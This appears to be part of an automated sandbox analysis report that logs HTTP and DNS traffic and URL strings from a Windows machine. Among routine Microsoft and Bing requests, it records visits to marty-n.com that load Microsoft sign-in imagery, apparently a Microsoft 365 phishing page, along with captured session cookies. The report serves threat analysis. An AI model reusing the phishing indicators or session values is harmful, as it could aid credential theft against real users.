Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
          Source: global trafficHTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: fp.msedge.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /rb/1a/cir3,ortl,cc,nc/f4st08wpuYBQ5KWRJ3MqAsJB8zg.css?bu=C8wJpQO8BKgKjQn3CP0GXV1dXQ&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133
          Source: global trafficHTTP traffic detected: GET /rb/1a/cir3,ortl,cc,nc/yy4SnZtT2-rfsZpLbcm-u8xyafQ.css?bu=B8YCSLQCmgFdXdEC&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133
          Source: global trafficHTTP traffic detected: GET /rb/3F/ortl,cc,nc/4-xJy3tX6bM2BGl5zKioiEcQ1TU.css?bu=A4gCjAKPAg&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133
          Source: global trafficHTTP traffic detected: GET /rb/6k/cir3,ortl,cc,nc/kMuSwIezxCpzqkuspnuwJzXKYu0.css?bu=M8IKvArICrwKrAu8CrILvAq8CrwKvQu8CsQLvArKC7wK0Au8CtYLvAraCrwK4Aq8CtQKvAq8CqMLvArvCrwK9Qq8CukKvAq8CoULiAu8CrwKoAuOC7wKlAuXC7wKggy8CtwLvAqwDA&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133
          Source: global trafficHTTP traffic detected: GET /apc/trans.gif?58491551ead6717ca8953d4619f8959a HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: bx-ring.msedge.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /apc/trans.gif?0bb944ce9eb8ccf482ff8db3c89d41d7 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: bx-ring.msedge.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /rb/6k/ortl,cc,nc/QNBBNqWD9F_Blep-UqQSqnMp-FI.css?bu=AbwK&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133
          Source: global trafficHTTP traffic detected: GET /o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA= HTTP/1.1Host: marty-n.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /o/jsnom.js HTTP/1.1Host: marty-n.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://marty-n.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://marty-n.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /apc/trans.gif?22db3acaefe0c8e5f7f11c615870399b HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: mwh06prdapp02-canary-opaph.netmon.azure.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /o/jsnom.js HTTP/1.1Host: marty-n.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://marty-n.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://marty-n.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://marty-n.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://marty-n.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://marty-n.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: marty-n.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://marty-n.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://marty-n.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /apc/trans.gif?42ef467e5f582ca56847c0384416bf70 HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: mwh06prdapp02-canary-opaph.netmon.azure.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: marty-n.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: marty-n.com
          Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: www.w3schools.com
          Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
          Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: http://weather.service.msn.com/data.aspx
          Source: chromecache_85.17.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.
          Source: chromecache_90.17.dr, chromecache_85.17.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e3281710
          Source: chromecache_90.17.dr, chromecache_85.17.drString found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffc
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://analysis.windows.net/powerbi/api
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.aadrm.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.aadrm.com/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.addins.omex.office.net/api/addins/search
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.addins.store.office.com/app/query
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.cortana.ai
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.diagnostics.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.diagnosticssdf.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.microsoftstream.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.microsoftstream.com/api/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.office.net
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.officescripts.microsoftusercontent.com/api
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.onedrive.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://api.scheduler.
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://apis.live.net/v5.0/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://apis.mobile.m365.svc.cloud.microsoft
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://app.powerbi.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://arc.msn.com/v4/api/selection
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
